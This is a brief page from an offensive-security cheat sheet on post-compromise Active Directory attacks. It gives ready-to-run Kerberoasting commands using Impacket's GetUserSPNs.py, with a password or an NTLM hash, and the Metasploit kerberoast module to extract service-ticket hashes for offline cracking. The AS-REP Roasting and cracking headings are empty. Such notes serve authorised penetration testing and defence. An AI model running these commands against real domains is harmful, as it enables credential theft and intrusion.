Authenticated (Post-Compsomise) Attacks
Kerberoasting
Discovery and Extraction
# Discover and extract Kerberoastable accounts
# It is recommended to use single quote to avoid interpreting special charecters like '$'
python3 GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <DC-IP> -request -outputfile kerberoast.txt
# Output to the terminal
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -request# Kerberoasting through Metasploit framework
use auxiliary/gather/kerberoast
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USERNAME <username>
set PASSWORD <password>
runOffline Cracking
AS-REP Roasting
Discovery and Extraction
Offline Cracking
Last updated
Was this helpful?